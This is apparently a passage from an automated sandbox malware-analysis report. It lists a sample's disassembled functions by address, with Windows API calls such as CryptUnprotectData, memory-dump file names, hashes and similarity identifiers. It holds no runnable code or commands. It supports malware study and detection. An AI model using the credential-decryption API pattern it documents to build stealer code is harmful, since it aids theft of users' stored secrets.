                    • Instruction ID: b67cab80ad0e986cda199b398d554f9d7a318dcb0ab9636874ad2c1fa56c299e
                    • Opcode Fuzzy Hash: aa97af20099f9e7096e208a29a4f8070b02da814db4469751557e12b14fb2dd9
                    • Instruction Fuzzy Hash: 81B2D6F360C2009FE304AE29EC8567AFBE9EF94720F1A893DE6C4C7744E67558418697
                    Function 00648EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00635184,40000001,00000000,00000000,?,00635184), ref: 00648EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: b6a638885ea95c65ccd9a041c68d172785c7b9438694a85e7bdbc997db430675
                    • Instruction ID: ea5128ceeec3b2c447f32630c222ad33449416db6f5f6c8184e70202bd2ad062
                    • Opcode Fuzzy Hash: b6a638885ea95c65ccd9a041c68d172785c7b9438694a85e7bdbc997db430675
                    • Instruction Fuzzy Hash: EC110674204208BFDB44CF64E888FAA37AABF89740F109458F9198B250DB76E885DB61
                    Function 00647A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,014502E8,00000000,?,00650E10,00000000,?,00000000,00000000), ref: 00647A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00647A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,014502E8,00000000,?,00650E10,00000000,?,00000000,00000000,?), ref: 00647A7D
                    • wsprintfA.USER32 ref: 00647AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: dbf220ff9781b49afb949352c8e0c98b76512b6b301755dfa4dbd1f348854fa3
                    • Instruction ID: 4cfe79570bf777780da11645cf4f05eb37b4b26d840d453d683bad55e93bc21b
                    • Opcode Fuzzy Hash: dbf220ff9781b49afb949352c8e0c98b76512b6b301755dfa4dbd1f348854fa3
                    • Instruction Fuzzy Hash: E6118EB1A45218EBEB24CB54DC49FA9B778FB44721F1043AAE90A932C0C7745A80CF52
                    Function 00643720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.COMBASE(0064E118,00000000,00000001,0064E108,00000000), ref: 00643758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006437B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: 1a3559cb1991024ae2ccf2d5c714401fd783c504f1d8d372c968107d59d77b2f
                    • Instruction ID: 0b9635a3b1f1b8c5611dae7dd792eeff0cda07f64e9e50cd009145535640f3fa
                    • Opcode Fuzzy Hash: 1a3559cb1991024ae2ccf2d5c714401fd783c504f1d8d372c968107d59d77b2f
                    • Instruction Fuzzy Hash: 7E41F670A40A289FDB24DF58CC94B9BB7B5BB48702F4041D8E618A72D0E771AEC5CF50
                    Function 00639B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00639B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00639BA3
                    • LocalFree.KERNEL32(?), ref: 00639BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    • Opcode ID: 847e5475d8031b739d224d51c0c8c59a421b3fc0fef6bd100241cbf471e91a94
                    • Instruction ID: 616705708d4e63ecf80c2391043b101d010badc1b0358f60c776d63d4f52a39b
                    • Opcode Fuzzy Hash: 847e5475d8031b739d224d51c0c8c59a421b3fc0fef6bd100241cbf471e91a94
                    • Instruction Fuzzy Hash: BA11CCB4A00209DFDB04DF94D989AAEB7B9FF88300F104558E915A7394D774AE50CFA1
                    Function 00990B30 Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: w=l|
                    • API String ID: 0-1810114630
                    • Opcode ID: aff3a47b4b603f6e4479b7cc7dfb152322b5c76c42b8e218878ffa56e251c9a2
                    • Instruction ID: 123da54afb80f564c09c2e2b4560466a01bb120980c1acd12553aecb5147e611
                    • Opcode Fuzzy Hash: aff3a47b4b603f6e4479b7cc7dfb152322b5c76c42b8e218878ffa56e251c9a2
                    • Instruction Fuzzy Hash: AC7117F3E082149FE3106A29DC457A6BBDADBD4320F1B863DEAC4D3784E9795C054792
                    Function 009838C9 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: J[4
                    • API String ID: 0-1610857072
                    • Opcode ID: 788f070fc3865af5fac15fca87e23744f63db86f909b8d1c2bdedbf721865904
                    • Instruction ID: 11a0ad7f217d34c41a4632e2cf1451573b50342de7d0d7a9be6c5279226540d9
                    • Opcode Fuzzy Hash: 788f070fc3865af5fac15fca87e23744f63db86f909b8d1c2bdedbf721865904
                    • Instruction Fuzzy Hash: BE51D2B3E186108FF3086E28DD8677ABBD6EB84310F1B813DDA89D7784E93959044785
                    Function 0096C3F8 Relevance: .2, Instructions: 215COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 95636059c972a9d28ca16ea1905b1b81bf04f0521ed442a3ab50f9d211b8abe6
                    • Instruction ID: a67f22e2a699776e26b99938ce946f92fe0eb5d50012783e177ecb6c3c1355cf
                    • Opcode Fuzzy Hash: 95636059c972a9d28ca16ea1905b1b81bf04f0521ed442a3ab50f9d211b8abe6
                    • Instruction Fuzzy Hash: F2516AF3948214ABE3006D3DDC8577BBBDDDB94224F2A0A3DEA94D3B84E97588054292
                    Function 00910B7C Relevance: .2, Instructions: 191COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d49c13023c33c229e044aeb6bf844536e6b762c19642c37820d2c31ea9c36b1
                    • Instruction ID: 8bd32fd64687c9556e29c1ffcd0c1dad8ddae747c10aa37bd7bea5d3167f9b5b
                    • Opcode Fuzzy Hash: 3d49c13023c33c229e044aeb6bf844536e6b762c19642c37820d2c31ea9c36b1
                    • Instruction Fuzzy Hash: E751F3F3E142205BE3146D2DDC9576AB6D9EF94320F1B463EEE88D7384E8794C0582D2
                    Function 00AEF909 Relevance: .2, Instructions: 169COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f02c9d5f957ad4cee424fa35953fd06bf557041d8fa2517885ccc4c02cb33c97
                    • Instruction ID: ae451339fbafa6531efab14896abc5ff036b266b4df58c7ee2d56653b1bb226a
                    • Opcode Fuzzy Hash: f02c9d5f957ad4cee424fa35953fd06bf557041d8fa2517885ccc4c02cb33c97
                    • Instruction Fuzzy Hash: E951CEB251C654DFD301AE19D88577AF7E8EB08360F26493EEAC6D7200E63298009B97
                    Function 009542AA Relevance: .2, Instructions: 155COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b5803cdf6fe4204318a681533910139cba8366a20152ae5140ee63986f4be026
                    • Instruction ID: 77090a042eb48fb30e65989621427bf7ed9dee7cca7e167355001e506648d27e
                    • Opcode Fuzzy Hash: b5803cdf6fe4204318a681533910139cba8366a20152ae5140ee63986f4be026
                    • Instruction Fuzzy Hash: 4B4146F3A086005FE359AA28EC4277AB7DADFC4320F1A853DE7C4D3784E979590186C6
                    Function 00908ED1 Relevance: .2, Instructions: 150COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cc28abd43d05949f6237760fdd9ece1de0abb867a1532be493c3b479799d1fa4
                    • Instruction ID: a3d812efffb9beb98f04dc1a4c4a40c2ef992e920bca95cf946796d61e472312
                    • Opcode Fuzzy Hash: cc28abd43d05949f6237760fdd9ece1de0abb867a1532be493c3b479799d1fa4
                    • Instruction Fuzzy Hash: 7F412AF36082009FF304AA29EC8577BB7EADBD4710F15CA3DE585C7744E63998468652
                    Function 00649750 Relevance: .0, Instructions: 15COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
